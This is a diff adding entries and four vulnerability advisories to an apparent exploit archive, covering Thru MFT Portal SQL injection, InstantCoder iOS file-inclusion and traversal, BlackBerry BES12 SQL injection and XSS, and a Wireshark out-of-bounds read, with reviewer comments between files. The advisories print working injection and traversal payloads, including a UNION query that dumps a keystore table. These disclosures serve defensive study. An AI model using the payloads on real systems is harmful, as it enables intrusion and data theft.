diff --git a/files.csv b/files.csv
index 1674a21f4..49020e8fd 100755
--- a/files.csv
+++ b/files.csv
@@ -33631,6 +33631,7 @@ id,file,description,date,author,platform,type,port
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
+39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
@@ -35716,3 +35717,9 @@ id,file,description,date,author,platform,type,port
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0
+39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow PoC",2016-02-22,INSECT.B,windows,local,0
+39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
+39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
+39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
diff --git a/platforms/asp/webapps/39485.txt b/platforms/asp/webapps/39485.txt
new file mode 100755
index 000000000..b4e51d06d
--- /dev/null
+++ b/platforms/asp/webapps/39485.txt
@@ -0,0 +1,126 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Advisory ID: SYSS-2015-056
+Product: Thru Managed File Transfer Portal
+Manufacturer: Thru
+Affected Version(s): 9.0.2
+Tested Version(s): 9.0.2
+Vulnerability Type: SQL Injection (CWE-89)
+Risk Level: High
+Solution Status: Open
+Manufacturer Notification: 2015-10-28
+Solution Date: 2016-01-22
+Public Disclosure: 2016-02-15
+CVE Reference: Not yet assigned
+Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
+ (SySS GmbH)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Overview:
+
+Thru Managed File Transfer Portal is a web based file transfer application.
+According to the Thru website [1], the application aims to offload large
+file transfer to a single platform, to protect files, to replace FTP
+servers and to allow access to files anytime, anywhere.
+
+An SQL injection vulnerability was identified in one of the GET request.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Vulnerability Details:
+
+The SQL injection vulnerability was found in a GET request that causes
+contact data to be sorted. At least the attribute values of sortorder
+and letterrange are not correctly sanitized and therefore can be abused
+to inject arbitrary SQL statements.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Proof of Concept (PoC):
+
+The following HTTP request can be used to show that the SQL statement
+causing a delay is executed and results in a 500 server error:
+
+GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
+Host: [HOST]
+Cookie: [COOKIES]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Solution:
+
+The reported security vulnerability has been fixed in a new software
+release. Update to the new software version.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Disclosure Timeline:
+
+2015-10-27: Vulnerability discovered
+2015-10-28: Vulnerability reported to manufacturer
+2016-01-22: Manufacturer announced update
+2016-02-15: Public release of security advisory
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+References:
+
+[1] Thru Homepage
+ http://www.thruinc.com
+[2] SySS Security Advisory SYSS-2015-056
+ https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
+[3] SySS Responsible Disclosure Policy
+ https://www.syss.de/en/news/responsible-disclosure-policy/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Credits:
+
+This security vulnerability was found by Dr. Erlijn van Genuchten and
+Danny Österreicher of the SySS GmbH.
+
+E-Mail: erlijn.vangenuchten@syss.de
+Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
+Key ID: 0xBD96FF2A
+Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
+
+E-Mail: danny.oesterreicher@syss.de
+Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
+Key ID: 0x96029AC7
+Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Disclaimer:
+
+The information provided in this security advisory is provided "as is"
+and without warranty of any kind. Details of this security advisory may
+be updated in order to provide as accurate information as possible. The
+latest version of this security advisory is available on the SySS Web
+site.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Copyright:
+
+Creative Commons - Attribution (by) - Version 3.0
+URL: http://creativecommons.org/licenses/by/3.0/deed.en
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1
+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+=df2e
+-----END PGP SIGNATURE-----
\ No newline at end of file
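Review bot: The header field `Solution Status: Open` contradicts the rest of the advisory, which gives `Solution Date: 2016-01-22` and says in the Solution section that the issue "has been fixed in a new software release"; that section also never names the fixed release, so a reader on 9.0.2 cannot tell which version to move to. Because the body is PGP clearsigned, correcting it in place would invalidate the signature, so the correction belongs upstream or in an unsigned line after the signature block, for example `Note: fixed version not stated in the advisory; confirm with the vendor`. For triage, the only indicators the text gives are the `sortorder` and `letterrange` query parameters of `contacts.asp`, so web logs showing statement separators or `WAITFOR` in those values are what to look for. A sort-order value usually cannot be bound as a query parameter, so the durable server-side fix is presumably an allow-list of permitted sort keys rather than escaping.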
diff --git a/platforms/ios/webapps/39479.txt b/platforms/ios/webapps/39479.txt
new file mode 100755
index 000000000..228f3296d
--- /dev/null
+++ b/platforms/ios/webapps/39479.txt
@@ -0,0 +1,298 @@
+Document Title:
+===============
+InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1738
+
+
+Release Date:
+=============
+2016-02-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1738
+
+
+Common Vulnerability Scoring System:
+====================================
+7
+
+
+Product & Service Introduction:
+===============================
+You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
+for your to code and debug web apps on your lovely iPhone and iPad.
+
+(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-02-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Shumin Sun
+Product: InstantCoder - iOS (Web-Application) 1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
+The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
+commands to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own
+files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
+file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
+inject the lfi payload by usage of the wifi interface or local file sync function.
+
+Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
+attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
+
+The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
+Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] ./toolkit/upload
+
+Vulnerable Parameter(s):
+ [+] filename
+
+Affected Module(s):
+ [+] Index File Dir Listing (http://localhost:8080/)
+
+
+
+1.2
+A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
+The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
+
+The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
+manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
+POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
+variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path.
+
+The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
+Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
+
+
+Request Method(s):
+ [+] [POST]
+
+Vulnerable Module(s):
+ [+] ./listFiles
+
+Vulnerable Parameter(s):
+ [+] path
+
+Affected Module(s):
+ [+] Index File Dir Listing (http://localhost:8080/)
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
+
+
+PoC: Vulnerable Source
+javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Content-Length[819]
+ Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------29343138867419
+Content-Disposition: form-data; name="path"
+-----------------------------29343138867419
+Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
+Content-Type: image/png
+-
+Status: 200[OK]
+GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Cache-Control[max-age=0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[4995]
+ Date[Mon, 22 Feb 2016 08:33:04 GMT]
+
+
+Reference(s):
+http://localhost:8080/toolkit/upload
+http://localhost:8080/toolkit/index.html
+
+
+
+1.2
+Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC: Payload
+http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
+
+
+PoC: Vulnerable Source
+
+
+
+
+
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[162]
+ Date[Mon, 22 Feb 2016 08:09:34 GMT]
+-
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2]
+ Date[Mon, 22 Feb 2016 08:09:37 GMT]
+-
+Status: 200[OK]
+POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:8080/toolkit/index.html]
+ Connection[keep-alive]
+ Content-Length[0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[2]
+ Date[Mon, 22 Feb 2016 08:09:45 GMT]
+
+
+Reference(s):
+http://localhost:8080/listFiles
+
+
+Security Risk:
+==============
+1.1
+The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
+
+1.2
+The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
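Review bot: The advisory has no solution or patch section, and its timeline lists only `2016-02-22: Public Disclosure` with no vendor contact, so a reader gets no remediation for either issue. The figures also disagree: issue 1.1 is scored 6.4 under Technical Details and `(CVSS 6.7)` under Security Risk, issue 1.2 is called a GET request under Security Risk while its Request Method(s) list says POST, and the product introduction names "CuteCoder" rather than InstantCoder. A short mitigation paragraph would help, along the lines of `Solution: resolve the path value to a canonical path and reject anything outside the app's document folder; store uploads under a sanitised base name and encode file names when rendering the listing`. Until a fixed build exists, the practical control the text supports is keeping the wifi interface on port 8080 switched off on untrusted networks.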
diff --git a/platforms/java/webapps/39481.txt b/platforms/java/webapps/39481.txt
new file mode 100755
index 000000000..49d1beb19
--- /dev/null
+++ b/platforms/java/webapps/39481.txt
@@ -0,0 +1,149 @@
+( , ) (,
+ . '.' ) ('. ',
+ ). , ('. ( ) (
+ (_,) .'), ) _ _,
+ / _____/ / _ \ ____ ____ _____
+ \____ \==/ /_\ \ _/ ___\/ _ \ / \
+ / \/ | \\ \__( <_> ) Y Y \
+/______ /\___|__ / \___ >____/|__|_| /
+ \/ \/.-. \/ \/:wq
+ (x.0)
+ '=.|w|.='
+ _=''"''=.
+
+ presents..
+
+BlackBerry Enterprise Service 12 (BES12) Self-Service
+Affected versions: BES12 < 12.4
+
+CVE: CVE-2016-1914 and CVE-2016-1915
+
+PDF:
+http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+
+
++-----------+
+|Description|
++-----------+
+
+Blackberry BES12 is an enterprise mobile management solution and
+contains a self-service web application available to mobile users. This
+web application contains multiple vulnerabilities including
+unauthenticated SQL
+injection and reflected cross site scripting.
+
+Limited access to an on-premise BES12 environment was provided during
+the discovery of these vulnerabilities. The full impact of the
+vulnerabilities in relation to compromising other portions of the BES12
+solution, such as mobile devices, is unclear.
+
+
++------------+
+|Exploitation|
++------------+
+
+*SQL Injection*
+
+The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
+injection via the imageName parameter. This servlet is exposed at
+multiple paths and is used to fetch an image from the database:
+
+/mydevice/client/image
+/admin/client/image
+/myapps/client/image
+/ssam/client/image
+/all/client/image
+
+
+This was discovered on a production BES12 on-premise deployment and the
+injection vector allowed both UNION and stacked queries to be executed
+on the Microsoft SQL server used by BES12. This allows full read/write
+access to the database, and can potentially result in command execution
+via xp_cmdshell depending on the database user configuration.
+
+The following proof of concept demonstrates an injection payload which
+will select the entire obj_keystore_entry table. The query will
+serialise the entire table into an XML document which is returned in the
+HTTP response as UTF-16 without the leading BOM (byte order mark)
+causing most text editors to fail to display the response correctly.
+
+https:///mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
+
+The technique above can be used to download any database table available
+to the BES12 database user.
+
+Notable database tables are:
+* obj_user which contains BES12 user details.
+* obj_user_authentication which contains authentication tokens.
+* obj_user_device which based on column names, contains enrolment
+tokens, enrolment secrets and device encryption keys.
+
+It is unclear if this information is sufficient to decrypt a lost/stolen
+BES12 mobile device.
+
+
+*Reflected Cross Site Scripting*
+
+Two areas of the self-service web application exist where user-supplied
+input is reflected directly in web pages, allowing a malicious user to
+conduct Cross Site Scripting (XSS) attacks against users of the
+application. While the application uses the HttpOnly cookie flag for
+session tokens, successful exploitation allows malicious JavaScript to
+perform any action within the application that the targeted user is able
+to. The administrative web application is typically hosted on the same
+domain and may be attacked using these XSS vectors, although this is
+BES12 deployment specific.
+
+The table below details where Cross Site Scripting was detected and
+which parameters are vulnerable:
+
+https:///mydevice/index.jsp?locale=">
+https:///mydevice/loggedOut.jsp?locale=">
+
+
++----------+
+| Solution |
++----------+
+
+
+Upgrade to BES12.4.
+
+
++-------------------+
+|Disclosure Timeline|
++-------------------+
+
+
+Initial disclosure to Blackberry – 19 Nov 2015
+Disclosure receipt confirmed by Blackberry – 19 Nov 2015
+Request for update from Blackberry – 7 Dec 2015
+Vulnerabilities confirmed by Blackberry – 8 Dec 2015
+Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
+BES12.4 released – 29 Jan 2016
+Advisory released – 15 Feb 2016
+
+
++-----------------------------+
+|About Security-Assessment.com|
++-----------------------------+
+
+
+Security-Assessment.com is a leading team of Information Security
+consultants specialising in providing high quality Information Security
+services to clients throughout the Asia Pacific region. Our clients
+include some of the largest globally recognised companies in areas such
+as finance, telecommunications, broadcasting, legal and government. Our
+aim is to provide the very best independent advice and a high level of
+technical expertise while creating long and lasting professional
+relationships with our clients.
+Security-Assessment.com is committed to security research and
+development, and its team continues to identify and responsibly publish
+vulnerabilities in public and private software vendor's products.
+Members of the Security-Assessment.com R&D team are globally recognised
+through their release of whitepapers and presentations related to new
+security research.
+
+For further information on this issue or any of our service offerings,
+contact us:
+Web www.security-assessment.com
+Email info@security-assessment.com
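Review bot: Both proof-of-concept URL groups are stored damaged: every URL begins `https:///` with the host missing, and the two reflected-XSS examples stop at `locale=">`, presumably because angle-bracketed text was stripped when the advisory was converted to plain text. The file should carry an explicit placeholder such as `https://[HOST]/mydevice/client/image?...` and point to the linked PDF for the original wording. The header lists CVE-2016-1914 and CVE-2016-1915 without saying which identifier belongs to the SQL injection and which to the cross-site scripting, which makes tracking each fix harder. For defenders the useful facts are that the injection is unauthenticated, that `ImageServlet` is reachable under five `/client/image` paths, and that the stated fix is BES12.4; running the database account without rights to `xp_cmdshell` limits the worst case the text describes.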
diff --git a/platforms/multiple/dos/39482.txt b/platforms/multiple/dos/39482.txt
new file mode 100755
index 000000000..070f433de
--- /dev/null
+++ b/platforms/multiple/dos/39482.txt
@@ -0,0 +1,98 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=656
+
+The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
+READ of size 4 at 0x7f72db15e078 thread T0
+ #0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
+ #1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
+ #2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
+ #3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
+ #8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
+ #9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
+ #10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
+ #14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
+ #15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
+ #16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
+ #17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+ #21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+ #22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+ #27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+ #32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+ #33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
+ #42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #43 0x5264eb in process_packet wireshark/tshark.c:3728:5
+ #44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+ #45 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
+Shadow bytes around the buggy address:
+ 0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
